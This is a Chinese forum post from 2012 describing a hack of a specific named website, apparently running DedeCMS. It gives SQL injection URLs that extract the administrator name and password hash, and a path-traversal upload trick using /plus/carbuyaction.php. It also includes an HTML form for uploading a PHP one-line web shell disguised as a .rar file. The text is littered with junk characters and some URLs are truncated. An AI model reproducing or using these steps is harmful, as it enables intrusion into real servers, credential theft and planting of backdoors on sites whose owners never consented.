①注入漏洞。
5 g9 w, ]5 k, J1 s3 D这站 http://www.political-security.com/
4 E) S+ i( |& I" D0 I0 ^0 D& {首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
+ Y1 X8 H% Y3 I: iwww.political-security.com/data/mysql_error_trace.inc 爆后台
, B" w# A; h- V0 s$ N- n然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
. `: e, G( B4 X; I/ p* R% u然后写上语句 9 S9 c, y) a; }% g& P. W# i( H
查看管理员帐号* y1 D; s4 `; u! [; J& U8 x
http://www.political-security.co ... &membergroup=@`& Z9 v! T# g6 s% \
- e; d1 j1 _9 t! ]" \admin ) T* z( I' q7 ~ A
2 q( F! \% H$ N7 ? l' K2 T# ~查看管理员密码% n; O4 Z# h6 Q# N) K7 N
http://www.political-security.co ... &membergroup=@`" x4 D! Q9 b/ D6 s" G
2 e# f' E- i% y) X4 O' m
8d29b1ef9f8c5a5af429
" f* s$ g; L, V" I5 {, h, s
: z* U8 V; [( C9 p: ]查看管理员密码: b* ?* g/ P2 L+ M* T' u( }; G
0 z& [+ A( ]) T) p5 ]" h4 o得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
, `4 `7 V- ]* E O2 E0 G$ E7 [% {$ g. l {; U
8d2* Z) K+ M& r y% N( b
9b1ef9f8c5a5af42
# s9 P7 |4 g8 z1 E: R9& P' o: s. A2 |7 A! {) f
4 c; D2 \9 D6 M r" G" H
cmd5没解出来 只好测试第二个方法
8 n1 h( [0 m ~; J6 M3 S, q# q- b9 T/ A# X* c! c+ k k& v+ c
% N. T- P: j- j# |) I, R7 }②上传漏洞:; e3 b3 R- I2 z8 k8 p6 m2 ]
+ W' N/ P1 \* y y# X+ \只要登陆会员中心,然后访问页面链接5 Q/ c: C5 q0 z$ U- V2 F+ Y
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
, G$ d! W e0 [8 s) O3 X$ L* e2 s# c$ N$ N
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”6 N. B4 a: k) {4 n- S% t
7 {2 A' q" a# o# v! W J$ e" p5 @# z
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm, M; S) c; R$ @8 k3 v8 J5 }
( E7 V5 M5 v4 Q" E/ W8 a
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
* [ q: S$ c% p& ]8 K( ~ a" j或者
( ]) p) N6 g5 g5 \; z- J% u即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对